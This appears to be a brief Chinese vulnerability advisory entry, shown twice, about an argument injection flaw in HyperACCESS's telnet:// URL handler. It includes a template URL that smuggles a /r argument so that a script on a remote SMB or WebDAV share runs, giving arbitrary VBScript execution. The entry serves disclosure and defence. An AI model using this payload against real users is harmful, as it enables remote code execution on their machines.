VULHUB ™

HyperACCESS是HyperTerminal的官方升级，可为用户提供终端通讯解决方案。 HyperAccess中存在参数注入漏洞，以要求URL协议处理telnet:// URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件，可使用类似于以下的URL通过Internet Explorer将该命令传送给URL：telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt ，如果SERVER为包含有恶意脚本的SMB共享或WEBDAV Web共享的话，就会导致执行任意vbscript代码。

HyperACCESS是HyperTerminal的官方升级，可为用户提供终端通讯解决方案。 HyperAccess中存在参数注入漏洞，以要求URL协议处理telnet:// URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件，可使用类似于以下的URL通过Internet Explorer将该命令传送给URL：telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt ，如果SERVER为包含有恶意脚本的SMB共享或WEBDAV Web共享的话，就会导致执行任意vbscript代码。